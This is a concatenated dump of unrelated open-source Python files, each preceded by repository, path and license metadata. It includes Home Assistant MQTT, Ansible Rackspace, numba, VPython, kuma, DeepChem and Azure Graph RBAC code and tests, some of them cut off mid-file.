key: config.get(key) for key in (
CONF_BLUE_TEMPLATE,
CONF_BRIGHTNESS_TEMPLATE,
CONF_COLOR_TEMP_TEMPLATE,
CONF_COMMAND_OFF_TEMPLATE,
CONF_COMMAND_ON_TEMPLATE,
CONF_EFFECT_TEMPLATE,
CONF_GREEN_TEMPLATE,
CONF_RED_TEMPLATE,
CONF_STATE_TEMPLATE,
CONF_WHITE_VALUE_TEMPLATE,
)
}
optimistic = config.get(CONF_OPTIMISTIC)
self._optimistic = optimistic \
or self._topics[CONF_STATE_TOPIC] is None \
or self._templates[CONF_STATE_TEMPLATE] is None
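        # Optimistic mode (set above): with no state topic or state template
        # to confirm changes, assume every command succeeds and update the
        # entity state immediately.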
# features
if self._templates[CONF_BRIGHTNESS_TEMPLATE] is not None:
self._brightness = 255
else:
self._brightness = None
if self._templates[CONF_COLOR_TEMP_TEMPLATE] is not None:
self._color_temp = 255
else:
self._color_temp = None
if self._templates[CONF_WHITE_VALUE_TEMPLATE] is not None:
self._white_value = 255
else:
self._white_value = None
if (self._templates[CONF_RED_TEMPLATE] is not None and
                self._templates[CONF_GREEN_TEMPLATE] is not None and
self._templates[CONF_BLUE_TEMPLATE] is not None):
            self._hs = [0, 0]
else:
self._hs = None
self._effect = None
async def _subscribe_topics(self):
"""(Re)Subscribe to topics."""
for tpl in self._templates.values():
if tpl is not None:
tpl.hass = self.hass
last_state = await self.async_get_last_state()
@callback
def state_received(topic, payload, qos):
"""Handle new MQTT messages."""
state = self._templates[CONF_STATE_TEMPLATE].\
async_render_with_possible_json_value(payload)
if state == STATE_ON:
self._state = True
elif state == STATE_OFF:
self._state = False
else:
_LOGGER.warning("Invalid state value received")
if self._brightness is not None:
try:
self._brightness = int(
self._templates[CONF_BRIGHTNESS_TEMPLATE].
async_render_with_possible_json_value(payload)
)
except ValueError:
_LOGGER.warning("Invalid brightness value received")
if self._color_temp is not None:
try:
self._color_temp = int(
                        self._templates[CONF_COLOR_TEMP_TEMPLATE].
                        async_render_with_possible_json_value(payload)
                    )
                except ValueError:
                    _LOGGER.warning("Invalid color temp value received")
|
cee1/cerbero-mac
|
test/test_cerbero_packages_wix.py
|
Python
|
lgpl-2.1
| 8,020
| 0.006733
|
# cerbero - a multi-platform build system for Open Source software
# Copyright (C) 2012 Andoni Morales Alastruey <ylatuya@gmail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
import unittest
import StringIO
from cerbero import hacks
from cerbero.build import recipe
from cerbero.config import Platform
from cerbero.packages import package
from cerbero.packages.wix import MergeModule
from cerbero.utils import etree
from test.test_build_common import create_cookbook
from test.test_packages_common import create_store
from test.test_common import DummyConfig
class Recipe1(recipe.Recipe):
name = 'recipe-test'
files_misc = ['bin/test.exe', 'bin/test2.exe', 'bin/test3.exe',
'README', 'lib/libfoo.dll', 'lib/gstreamer-0.10/libgstplugins.dll']
class Package(package.Package):
name = 'gstreamer-test'
shortdesc = 'GStreamer Test'
longdesc = 'test'
version = '1.0'
licences = ['LGPL']
uuid = '1'
vendor = 'GStreamer Project'
files = ['recipe-test:misc']
MERGE_MODULE = '''\
<?xml version="1.0" ?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Module Id="_gstreamer_test" Language="1033" Version="1.0">
<Package Comments="test" Description="GStreamer Test" Id="1" Manufacturer="GStreamer Project"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Component Guid="1" Id="_readme">
<File Id="_readme_1" Name="README" Source="z:\\\\\\test\\\\README"/>
</Component>
<Directory Id="_bin" Name="bin">
<Component Guid="1" Id="_test.exe">
<File Id="_testexe" Name="test
|
.exe" Source="z:\\\\\\test\\\\bin\\\\test.exe"/>
</Component>
<Component Guid="1" Id="_test2
|
.exe">
<File Id="_test2exe" Name="test2.exe" Source="z:\\\\\\test\\\\bin\\\\test2.exe"/>
</Component>
<Component Guid="1" Id="_test3.exe">
<File Id="_test3exe" Name="test3.exe" Source="z:\\\\\\test\\\\bin\\\\test3.exe"/>
</Component>
</Directory>
<Directory Id="_lib" Name="lib">
<Directory Id="_gstreamer_0.10" Name="gstreamer-0.10">
<Component Guid="1" Id="_libgstplugins.dll">
<File Id="_libgstpluginsdll" Name="libgstplugins.dll" Source="z:\\\\\\test\\\\lib\\\\gstreamer-0.10\\\\libgstplugins.dll"/>
</Component>
</Directory>
<Component Guid="1" Id="_libfoo.dll">
<File Id="_libfoodll" Name="libfoo.dll" Source="z:\\\\\\test\\\\lib\\\\libfoo.dll"/>
</Component>
</Directory>
</Directory>
</Module>
</Wix>
'''
class MergeModuleTest(unittest.TestCase):
def setUp(self):
self.config = DummyConfig()
cb = create_cookbook(self.config)
store = create_store(self.config)
cb.add_recipe(Recipe1(self.config))
self.package = Package(self.config, store, cb)
self.mergemodule = MergeModule(self.config,
self.package.files_list(), self.package)
def test_add_root(self):
self.mergemodule._add_root()
self.assertEquals(
'<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi" />',
etree.tostring(self.mergemodule.root))
def test_add_module(self):
self.mergemodule._add_root()
self.mergemodule._add_module()
self.assertEquals(
'<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">'
'<Module Id="_gstreamer_test" Language="1033" Version="1.0" />'
'</Wix>', etree.tostring(self.mergemodule.root))
def test_add_package(self):
self.mergemodule._add_root()
self.mergemodule._add_module()
self.mergemodule._add_package()
self.assertEquals(
'<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">'
'<Module Id="_gstreamer_test" Language="1033" Version="1.0">'
'<Package Comments="test" Description="GStreamer Test" Id="1" '
'Manufacturer="GStreamer Project" />'
'</Module>'
'</Wix>', etree.tostring(self.mergemodule.root))
def test_add_root_dir(self):
self.mergemodule._add_root()
self.mergemodule._add_module()
self.mergemodule._add_package()
self.mergemodule._add_root_dir()
self.assertEquals(
'<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">'
'<Module Id="_gstreamer_test" Language="1033" Version="1.0">'
'<Package Comments="test" Description="GStreamer Test" Id="1" '
'Manufacturer="GStreamer Project" />'
'<Directory Id="TARGETDIR" Name="SourceDir" />'
'</Module>'
'</Wix>', etree.tostring(self.mergemodule.root))
def test_add_directory(self):
self.mergemodule._add_root()
self.mergemodule._add_module()
self.mergemodule._add_package()
self.mergemodule._add_root_dir()
self.assertEquals(len(self.mergemodule._dirnodes), 1)
self.assertEquals(self.mergemodule._dirnodes[''], self.mergemodule.rdir)
self.mergemodule._add_directory('lib/gstreamer-0.10')
self.assertEquals(len(self.mergemodule._dirnodes), 3)
self.assertTrue('lib' in self.mergemodule._dirnodes)
self.assertTrue('lib/gstreamer-0.10' in self.mergemodule._dirnodes)
self.mergemodule._add_directory('bin')
self.assertEquals(len(self.mergemodule._dirnodes), 4)
self.assertTrue('bin' in self.mergemodule._dirnodes)
def test_add_file(self):
self.mergemodule._add_root()
self.mergemodule._add_module()
self.mergemodule._add_package()
self.mergemodule._add_root_dir()
self.assertEquals(len(self.mergemodule._dirnodes), 1)
self.assertEquals(self.mergemodule._dirnodes[''], self.mergemodule.rdir)
self.mergemodule._add_file('bin/gst-inspect-0.10.exe')
self.assertEquals(len(self.mergemodule._dirnodes), 2)
self.assertTrue('bin' in self.mergemodule._dirnodes)
self.assertTrue('gstreamer-0.10.exe' not in self.mergemodule._dirnodes)
self.mergemodule._add_file('bin/gst-launch-0.10.exe')
self.assertEquals(len(self.mergemodule._dirnodes), 2)
self.assertTrue('bin' in self.mergemodule._dirnodes)
self.assertTrue('gstreamer-0.10.exe' not in self.mergemodule._dirnodes)
def test_render_xml(self):
self.config.platform = Platform.WINDOWS
self.mergemodule._get_uuid = lambda : '1'
self.mergemodule.fill()
tmp = StringIO.StringIO()
self.mergemodule.write(tmp)
#self._compstr(tmp.getvalue(), MERGE_MODULE)
self.assertEquals(MERGE_MODULE, tmp.getvalue())
def _compstr(self, str1, str2):
str1 = str1.split('\n')
str2 = str2.split('\n')
for i in range(len(str1)):
if str1[i] != str2[i]:
print str1[i]
print str2[i]
print ""
class InstallerTest(unittest.TestCase):
def setUp(self):
pass
def testAddRoot(self):
pass
def testAddProduct(self):
pass
def testAddPackage(self):
pass
def testAddInstallDir(self):
pass
def testAddUIProps(self):
pass
def testAddMedia(self):
pass
def testAddMergeModules(self):
pass
def testAddMergeModules(self):
pass
def testRender(self):
pass
|
noslenfa/tdjangorest
|
uw/lib/python2.7/site-packages/generate_scaffold/management/verbosity.py
|
Python
|
apache-2.0
| 1,463
| 0
|
import os
from django.core.management.color import supports_color
from django.utils import termcolors
class VerboseCommandMixin(object):
    def __init__(self, *args, **kwargs):
super(VerboseCommandMixin, self).__init__(*args, **kwargs)
self.dry_run = False
if supports_color():
opts = ('bold',)
self.style.EXISTS = \
termcolors.make_style(fg='blue', opts=opts)
self.style.APPEND = \
termcolors.make_style(fg='yellow', opts=opts)
self.style.CREATE = \
termcolors.make_style(fg='green', opts=opts)
self.style.REVERT = \
termcolors.make_style(fg='magenta', opts=opts)
self.style.BACKUP = \
termcolors.make_style(fg='cyan', opts=opts)
def msg(self, action, path):
is_withholding_action = False
non_actions = set(['create', 'append', 'revert'])
if self.dry_run and action in non_actions:
is_withholding_action = True
if hasattr(self.style, action.upper()):
s = getattr(self.style, action.upper())
action = s(action)
if is_withholding_action:
action = self.style.NOTICE('did not ') + action
output = '\t{0:>25}\t{1:<}\n'.format(action, os.path.relpath(path))
self.stdout.write(output)
def log(self, output):
if self.verbose:
self.stdout.write(output)
|
xroot88/rax_ansible
|
library/rax_security_group.py
|
Python
|
apache-2.0
| 3,554
| 0.002532
|
"""Dummy module to create rax security groups"""
#!/usr/bin/env python
import pyrax
from ansible.module_utils.basic import *
uri_sgs = 'https://dfw.networks.api.rackspacecloud.com/v2.0/security-groups'
def get_sg(cnw, name):
try:
result, sgs = cnw.identity.method_get(uri_sgs)
if result.status_code == 200:
sg_list = filter(lambda sg: sg['name'] == name,
sgs['security_groups'])
return result.status_code, sg_list
except Exception as e:
return e.code, {'status': e.code, 'message': e.message}
def rax_security_group_present(data):
name = data['name']
description = data['description']
cnw = pyrax.cloud_networks
# If already exists, just return the first matching id
result, sg_list = get_sg(cnw, name)
if sg_list:
return False, False, sg_list[0]
data_json = {
'security_group': {
'name': name,
'description' : description
}
}
try:
result, sg = cnw.identity.method_post(uri_sgs, data=data_json)
if result.status_code == 201:
return False, True, result.json()['security_group']
elif result.status_code == 422:
return False, False, result.json()
else:
return True, False, {'status': result.status_code, 'data':
result.json()}
except Exception as e:
return True, False, {'status': 'ERROR', 'data': e.message}
def rax_security_group_absent(data=None):
cnw = pyrax.cloud_networks
name = data['name']
status_code, sg_list = get_sg(cnw, name)
result = None
for sg in sg_list:
sg_id = sg['id']
try:
result, _ = cnw.identity.method_delete(uri_sgs + '/' + sg_id)
if result.status_code == 200:
continue
except pyrax.exceptions.ClientException as e:
if e.code == 409:
return True, False, {'status': 'ERROR',
'security_group_id': sg_id,
'data': 'Security group in use'
}
except Exception as e:
return True, False, {'status': 'ERROR',
'security_group_id': sg_id}
if result:
return False, True, {'status': 'deleted', 'deleted_security_groups':
[sg['id'] for sg in sg_list]}
else:
return False, False, {'status': 'security group not found', 'security_groups':
sg_list}
def main():
fields = {
'name': {'required': True, 'type': 'str'},
'description': {'required': False, 'type': 'str'},
'region': {'required': True, 'type': 'str'},
'state': {
'default': 'present',
'choices': ['present', 'absent'],
'type': 'str'
}
}
choice_map = {
'present': rax_security_group_present,
'absent': rax_security_group_absent
}
module = AnsibleModule(argument_spec=fields)
pyrax.set_setting('identity_type', 'rackspace')
    pyrax.set_credential_file('rax.py')
pyrax.set_setting('region', module.params['region'])
is_error, has_changed, result = \
choice_map.get(module.params['state'])(module.params)
if not is_error:
module.exit_json(changed=has_changed, security_group=result)
else:
module.fail_json(msg='Error', security_group=result)
if __name__ == '__main__':
main()
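# Example playbook task for this module (hypothetical values), matching the
# argument_spec defined in main() above:
#
#   - rax_security_group:
#       name: web-sg
#       description: allow inbound web traffic
#       region: DFW
#       state: present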
|
GaZ3ll3/numba
|
numba/cuda/tests/cudadrv/test_inline_ptx.py
|
Python
|
bsd-2-clause
| 1,302
| 0
|
from __future__ import print_function, division, absolute_import
from llvmlite.llvmpy.core import Module, Type, Builder, InlineAsm
from llvmlite import binding as ll
from numba.cuda.cudadrv import nvvm
from numba.cuda.testing import unittest, CUDATestCase
from numba.cuda.testing import skip_on_cudasim
@skip_on_cudasim('Inline PTX cannot be used in the simulator')
class TestCudaInlineAsm(CUDATestCase):
def test_inline_rsqrt(self):
mod = Module.new(__name__)
fnty = Type.function(Type.void(), [Type.pointer(Type.float())])
fn = mod.add_function(fnty, 'cu_rsqrt')
bldr = Builder.new(fn.append_basic_block('entry'))
rsqrt_approx_fnty = Type.function(Type.float(), [Type.float()])
inlineasm = InlineAsm.get(rsqrt_approx_fnty,
'rsqrt.approx.f32 $0, $1;',
'=f,f', side_effect=True)
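        # '=f,f' constrains both the result and the single operand to f32
        # registers; side_effect=True keeps LLVM from folding the asm away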
val = bldr.load(fn.args[0])
res = bldr.call(inlineasm, [val])
bldr.store(res, fn.args[0])
bldr.ret_void()
# generate ptx
nvvm.fix_data_layout(mod)
nvvm.set_cuda_kernel(fn)
nvvmir = str(mod)
ptx = nvvm.llvm_to_ptx(nvvmir)
        self.assertTrue('rsqrt.approx.f32' in str(ptx))
if __name__ == '__main__':
unittest.main()
|
NicovincX2/Python-3.5
|
Divers/draw_a_clock_vpython.py
|
Python
|
gpl-3.0
| 6,444
| 0.001552
|
# -*- coding: utf-8 -*-
"""Clock for VPython - Complex (cx@cx.hu) 2003. - Licence: Python
Usage:
from visual import *
from cxvp_clock import *
clk=Clock3D()
while 1:
    rate(1)
    clk.update()
See doc strings for more.
Run this module to test clocks.
TODO: More types of clocks, such as 3D digital,
church clock, hour-glass, pendulum clock, stopper, etc...
Modifications:
2003.01.23. - Complex (cx@cx.hu): First release
2003.01.23. - Complex (cx@cx.hu): now gmtime imported correctly
"""
import os
__all__ = ['Clock3D']
from visual import *
from visual.text import text
from time import time, localtime, gmtime
from math import sin, cos, pi
def Clock3D(clock_type='analog', *args, **kw):
"""Create a clock with specified type,
keyword arguments are passed through,
returns a VPython object derived from frame"""
if clock_type == 'analog':
return AnalogClock(*args, **kw)
    raise ValueError('Invalid 3D clock type: %r' % (clock_type,))
class Base(object):
"""Base class to pass specific keyword
arguments with convenient defaults"""
    def __init__(self, kwlist={}, *args, **kw):
        self.kwlist = kwlist
        for k, v in kwlist.items():
if kw.has_key(k):
v = kw[k]
del kw[k]
self.__dict__[k] = v
self.args = args
self.kw = kw
class AnalogClock(Base):
"""Analog clock, keyword arguments:
frame=reference frame to use (default: None),
    pointers=pointers to display, combination of characters 'h', 'm' and 's' (default: 'hms')
ring_color=color of ring around the clock (default: color.yellow)
back_color=color of clock's back plate (default: color.white)
big_tick_color=color of big ticks (at 12,3,6,9 hours) (default: color.red)
small_tick_color=color of small ticks (at 1,2,4,5,7,8,10,11 hours) (default: color.blue)
minute_dot_color=color of minute dots between ticks (default: (0.4,0.4,0.4))
number_color=color of hour numbers (default: color.black)
hour_pointer_color=color of hour pointer (default: color.red)
    minute_pointer_color=color of minute pointer (default: color.blue)
    second_pointer_color=color of second pointer (default: (0.4,0.4,0.4))
"""
def __init__(self, *args, **kw):
"""Create primitives of clock"""
Base.__init__(self, {
'frame': None,
'pointers': 'hms',
'ring_color': color.yellow,
'back_color': color.white,
'big_tick_color': color.red,
'small_tick_color': color.blue,
'minute_dot_color': (0.4, 0.4, 0.4),
'number_color': color.black,
'hour_pointer_color': color.red,
'minute_pointer_color': color.blue,
'second_pointer_color': (0.4, 0.4, 0.4)}, *args, **kw)
if not self.frame:
self.frame = frame(*self.args, **self.kw)
pl = list(self.pointers)
hp, mp, sp = 'h' in pl, 'm' in pl, 's' in pl
ring(frame=self.frame, axis=(0, 0, 1), radius=1,
thickness=0.05, color=self.ring_color)
cylinder(frame=self.frame, pos=(0, 0, -0.03),
axis=(0, 0, 0.02), radius=1, color=self.back_color)
for i in range(60):
a = pi * i / 30.0
if i % 5 == 0:
j = i / 5
if j % 3:
c, h = self.small_tick_color, 0.06
else:
c, h = self.big_tick_color, 0.12
box(frame=self.frame, pos=(0.99, 0, 0), length=0.14, height=h,
                    width=0.12, color=c).rotate(angle=a, axis=(0, 0, 1), origin=(0, 0, 0))
t = text(pos=(0.8 * sin(a), 0.8 * cos(a) - 0.06, 0), axis=(1, 0, 0), height=0.12,
string=str(j + 12 * (not j)), color=self.number_color, depth=0.02, justify='center')
for o in t.objects:
o.frame.frame = self.frame
else:
sphere(frame=self.frame, pos=(1, 0, 0.05), radius=0.01, color=self.minute_dot_color).rotate(
angle=a, axis=(0, 0, 1), origin=(0, 0, 0))
if hp:
self.hf = hf = frame(frame=self.frame)
cylinder(frame=hf, pos=(0, 0, -0.01), axis=(0, 0, 0.02),
radius=0.08, color=self.hour_pointer_color)
box(frame=hf, pos=(0.25, 0, 0.005), axis=(0.5, 0, 0),
height=0.04, width=0.01, color=self.hour_pointer_color)
else:
self.hf = None
if mp:
self.mf = mf = frame(frame=self.frame)
cylinder(frame=mf, pos=(0, 0, 0.01), axis=(0, 0, 0.02),
radius=0.06, color=self.minute_pointer_color)
box(frame=mf, pos=(0.35, 0, 0.025), axis=(0.7, 0, 0),
height=0.03, width=0.01, color=self.minute_pointer_color)
else:
self.mf = None
if sp:
self.sf = sf = frame(frame=self.frame)
cylinder(frame=sf, pos=(0, 0, 0.03), axis=(0, 0, 0.02),
radius=0.04, color=self.second_pointer_color)
box(frame=sf, pos=(0.4, 0, 0.045), axis=(0.8, 0, 0),
height=0.02, width=0.01, color=self.second_pointer_color)
else:
self.sf = None
self.update()
def update(self, unixtime=None, gmt=0):
"""Update clock to specific unix timestamp
or current local time if not specified or None,
use GMT time if gmt is true"""
        if unixtime is None:
unixtime = time()
if gmt:
tm = gmtime(unixtime)
else:
tm = localtime(unixtime)
h, m, s = tm[3:6]
ts = h * 3600 + m * 60 + s
aml = [2.0 / 86400.0, 1.0 / 3600.0, 1.0 / 60.0]
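        # fractions of a full turn per elapsed second: the hour hand turns
        # once per 12 h (2/86400 of a turn each second), the minute hand
        # once per hour (1/3600) and the second hand once per minute (1/60)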
for am, f in zip(aml, [self.hf, self.mf, self.sf]):
if not f:
continue
a = 2 * pi * ts * am
f.axis = ax = rotate((0, 1, 0), angle=-a, axis=(0, 0, 1))
f.up = cross(vector(0, 0, 1), ax)
def TestClocks():
scene.title = 'cx_clock test'
tl = [('analog', 0, 0, -pi / 6)]
clk = []
for t, x, y, r in tl:
frm = frame(pos=(x, y, -0.3), axis=(1, 0, 0),
up=rotate((0, 1, 0), axis=(1, 0, 0), angle=r), visible=0)
clk.append(Clock3D(t, frame=frm))
while 1:
rate(1)
for c in clk:
c.update()
c.frame.visible = 1
if __name__ == '__main__':
TestClocks()
os.system("pause")
|
apruden/mica2
|
mica-python-client/src/main/python/mica/access_harmonization_dataset.py
|
Python
|
gpl-3.0
| 1,215
| 0.004115
|
"""
Apply access on a harmonization dataset.
"""
import sys
import pycurl
import mica.core
import mica.access
def add_arguments(parser):
"""
Add command specific options
"""
mica.access.add_permission_arguments(parser, True)
parser.add_argument('id', help='Harmonization dataset ID')
def do_command(args):
"""
Execute access command
"""
# Build and send requests
try:
mica.access.validate_args(args)
request = mica.core.MicaClient.build(mica.core.MicaClient.LoginInfo.parse(args)).new_request()
if args.verbose:
request.verbose()
# send request
if args.delete:
request.delete()
else:
request.put()
        response = request.resource(mica.access.do_ws(args, ['draft','harmonization-dataset', args.id, 'accesses'])).send()
        # format response
        if response.code != 204:
            print response.content
except Exception, e:
print e
sys.exit(2)
except pycurl.error, error:
        errno, errstr = error
print >> sys.stderr, 'An error occurred: ', errstr
sys.exit(2)
|
cloudify-cosmo/cloudify-manager
|
tests/integration_tests/resources/dsl/deployment_update/modify_relationship_operation/modification/custom_workflow.py
|
Python
|
apache-2.0
| 304
| 0
|
from cloudify.workflows import ctx, parameters
ctx.logger.info(parameters.node_id)
instance = [n for n in ctx.node_instances
if n.node_id == parameters.node_id][0]
for relationship in instance.relationships:
    relationship.execute_source_operation('custom_lifecycle.custom_operation')
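# i.e. run the source-side 'custom_operation' of the 'custom_lifecycle'
# interface on every relationship of the matched node instance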
|
safwanrahman/kuma
|
kuma/attachments/tests/test_views.py
|
Python
|
mpl-2.0
| 9,771
| 0
|
import datetime
import json
from constance.test import override_config
from django.conf import settings
from django.core.files.base import ContentFile
from django.db import transaction
from django.utils.http import parse_http_date_safe
from kuma.core.urlresolvers import reverse
from kuma.users.tests import UserTestCase
from kuma.wiki.models import DocumentAttachment
from kuma.wiki.tests import WikiTestCase, document, revision
from ..models import Attachment, AttachmentRevision
from . import make_test_file
@override_config(WIKI_ATTACHMENT_ALLOWED_TYPES='text/plain')
class AttachmentViewTests(UserTestCase, WikiTestCase):
def setUp(self):
super(AttachmentViewTests, self).setUp()
self.client.login(username='admin', password='testpass')
self.revision = revision(save=True)
self.document = self.revision.document
self.files_url = reverse('attachments.edit_attachment',
kwargs={'document_path': self.document.slug},
locale='en-US')
@transaction.atomic
def _post_attachment(self):
file_for_upload = make_test_file(
content='A test file uploaded into kuma.')
post_data = {
'title': 'Test uploaded file',
'description': 'A test file uploaded into kuma.',
'comment': 'Initial upload',
'file': file_for_upload,
}
response = self.client.post(self.files_url,
data=post_data)
return response
def test_legacy_redirect(self):
test_user = self.user_model.objects.get(username='testuser2')
test_file_content = 'Meh meh I am a test file.'
test_files = (
{'file_id': 97, 'filename': 'Canvas_rect.png',
'title': 'Canvas rect'},
{'file_id': 107, 'filename': 'Canvas_smiley.png',
'title': 'Canvas smiley'},
{'file_id': 86, 'filename': 'Canvas_lineTo.png',
'title': 'Canvas lineTo'},
{'file_id': 55, 'filename': 'Canvas_arc.png',
'title': 'Canvas arc'},
)
for test_file in test_files:
attachment = Attachment(
title=test_file['title'],
mindtouch_attachment_id=test_file['file_id'],
)
attachment.save()
now = datetime.datetime.now()
revision = AttachmentRevision(
attachment=attachment,
mime_type='text/plain',
title=test_file['title'],
description='',
created=now,
is_approved=True)
revision.creator = test_user
revision.file.save(test_file['filename'],
ContentFile(test_file_content))
revision.make_current()
mindtouch_url = reverse('attachments.mindtouch_file_redirect',
args=(),
kwargs={'file_id': test_file['file_id'],
'filename': test_file['filename']})
response = self.client.get(mindtouch_url)
self.assertRedirects(response, attachment.get_file_url(),
status_code=301,
fetch_redirect_response=False)
def test_get_request(self):
response = self.client.get(self.files_url, follow=True)
self.assertRedirects(response, self.document.get_edit_url())
def test_edit_attachment(self):
response = self._post_attachment()
self.assertRedirects(response, self.document.get_edit_url())
attachment = Attachment.objects.get(title='Test uploaded file')
rev = attachment.current_revision
self.assertEqual(rev.creator.username, 'admin')
self.assertEqual(rev.description, 'A test file uploaded into kuma.')
self.assertEqual(rev.comment, 'Initial upload')
self.assertTrue(rev.is_approved)
def test_attachment_raw_requires_attachment_host(self):
response = self._post_attachment()
attachment = Attachment.objects.get(title='Test uploaded file')
url = attachment.get_file_url()
response = self.client.get(url)
self.assertRedirects(response, url,
fetch_redirect_response=False,
status_code=301)
response = self.client.get(url, HTTP_HOST=settings.ATTACHMENT_HOST)
self.assertTrue(response.streaming)
self.assertEqual(response['x-frame-options'],
'ALLOW-FROM %s' % settings.DOMAIN)
self.assertEqual(response.status_code, 200)
self.assertIn('Last-Modified', response)
self.assertNotIn('1970', response['Last-Modified'])
self.assertIn('GMT', response['Last-Modified'])
self.assertIsNotNone(parse_http_date_safe(response['Last-Modified']))
def test_get_previous(self):
"""
        AttachmentRevision.get_previous() should return this revision's
        file's most recent approved revision."""
test_user = self.user_model.objects.get(username='testuser2')
attachment = Attachment(title='Test attachment for get_previous')
attachment.save()
revision1 = AttachmentRevision(
attachment=attachment,
mime_type='text/plain',
title=attachment.title,
description='',
comment='Initial revision.',
created=datetime.datetime.now() - datetime.timedelta(seconds=30),
creator=test_user,
is_approved=True)
revision1.file.save('get_previous_test_file.txt',
ContentFile('I am a test file for get_previous'))
revision1.save()
revision1.make_current()
revision2 = AttachmentRevision(
attachment=attachment,
mime_type='text/plain',
title=attachment.title,
description='',
comment='First edit..',
created=datetime.datetime.now(),
creator=test_user,
is_approved=True)
revision2.file.save('get_previous_test_file.txt',
ContentFile('I am a test file for get_previous'))
revision2.save()
revision2.make_current()
self.assertEqual(revision1, revision2.get_previous())
@override_config(WIKI_ATTACHMENT_ALLOWED_TYPES='application/x-super-weird')
def test_mime_type_filtering(self):
"""
Don't allow uploads outside of the explicitly-permitted
mime-types.
"""
_file = make_test_file(content='plain and text', suffix='.txt')
post_data = {
'title': 'Test disallowed file type',
'description': 'A file kuma should disallow on type.',
'comment': 'Initial upload',
'file': _file,
}
response = self.client.post(self.files_url, data=post_data)
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'Files of this type are not permitted.')
_file.close()
def test_intermediate(self):
"""
Test that the intermediate DocumentAttachment gets created
correctly when adding an Attachment with a document_id.
"""
doc = document(locale='en-US',
slug='attachment-test-intermediate',
save=True)
revision(document=doc, is_approved=True, save=True)
        file_for_upload = make_test_file(
            content='A file for testing intermediate attachment model.')
        post_data = {
'title': 'Intermediate test file',
'description': 'Intermediate test file',
'comment': 'Initial upload',
'file': file_for_upload,
}
files_url = reverse('attachments.edit_attachment',
kwargs={'document_path': doc.slug},
locale='en-US')
response = self.client.post(files_url, data=post_data)
self.assertEqual(response.status_code, 302)
self.asse
|
Agent007/deepchem
|
examples/tox21/tox21_graphcnn.py
|
Python
|
mit
| 1,211
| 0.003303
|
"""
Script that trains graph-conv models on Tox21 dataset.
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
import json
np.random.seed(123)
import tensorflow as tf
tf.set_random_seed(123)
import deepchem as dc
from deepchem.molnet import load_tox21
from deepchem.models.tensorgraph.models.graph_models import PetroskiSuchModel
model_dir = "/tmp/graph_conv"
# Load Tox21 dataset
tox21_tasks, tox21_datasets, transformers = load_tox21(
featurizer='AdjacencyConv')
train_dataset, valid_dataset, test_dataset = tox21_datasets
print(train_dataset.data_dir)
print(valid_dataset.data_dir)
# Fit models
metric = dc.metrics.Metric(
dc.metrics.roc_auc_score, np.mean, mode="classification")
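# i.e. the ROC AUC score averaged across the Tox21 tasks with np.mean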
# Batch size of models
batch_size = 128
model = PetroskiSuchModel(
len(tox21_tasks), batch_size=batch_size, mode='classification')
model.fit(train_dataset, nb_epoch=10)
print("Evaluating model")
train_scores = model.evaluate(train_dataset, [metric], transformers)
valid_scores = model.evaluate(valid_dataset, [metric], transformers)
print("Train scores")
print(train_scores)
print("Validation scores")
print(valid_scores)
|
Azure/azure-sdk-for-python
|
sdk/graphrbac/azure-graphrbac/azure/graphrbac/models/domain_py3.py
|
Python
|
mit
| 2,154
| 0.000464
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class Domain(Model):
"""Active Directory Domain information.
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
    :param additional_properties: Unmatched properties from the message are
     deserialized to this collection
    :type additional_properties: dict[str, object]
:ivar authentication_type: the type of the authentication into the domain.
:vartype authentication_type: str
:ivar is_default: if this is the default domain in the tenant.
:vartype is_default: bool
:ivar is_verified: if this domain's ownership is verified.
    :vartype is_verified: bool
:param name: Required. the domain name.
:type name: str
"""
_validation = {
'authentication_type': {'readonly': True},
'is_default': {'readonly': True},
'is_verified': {'readonly': True},
'name': {'required': True},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'authentication_type': {'key': 'authenticationType', 'type': 'str'},
'is_default': {'key': 'isDefault', 'type': 'bool'},
'is_verified': {'key': 'isVerified', 'type': 'bool'},
'name': {'key': 'name', 'type': 'str'},
}
def __init__(self, *, name: str, additional_properties=None, **kwargs) -> None:
super(Domain, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.authentication_type = None
self.is_default = None
self.is_verified = None
self.name = name
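    # Hypothetical usage sketch: only 'name' is caller-settable here; the
    # read-only attributes are populated by the service on deserialization.
    #   domain = Domain(name='contoso.com')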
|
jimcarreer/hpack
|
test/test_hpack_integration.py
|
Python
|
mit
| 2,084
| 0.001919
|
# -*- coding: utf-8 -*-
"""
This module defines substantial HPACK integration tests. These can take a very
long time to run, so they're outside the main test suite, but they need to be
run before every change to HPACK.
"""
from hpack.hpack import Decoder, Encoder
from binascii import unhexlify
from pytest import skip
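# Shape of a 'story' fixture as consumed below (the wire value is a
# hypothetical hex string):
#   {'draft': 9,
#    'cases': [{'header_table_size': 4096,
#               'wire': '828684...',
#               'headers': [{':method': 'GET'}, {':path': '/'}]}]}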
class TestHPACKDecoderIntegration(object):
def test_can_decode_a_story(self, story):
d = Decoder()
# We test against draft 9 of the HPACK spec.
if story['draft'] != 9:
skip("We test against draft 9, not draft %d" % story['draft'])
for case in story['cases']:
try:
d.header_table_size = case['header_table_size']
except KeyError:
pass
decoded_headers = d.decode(unhexlify(case['wire']))
# The correct headers are a list of dicts, which is annoying.
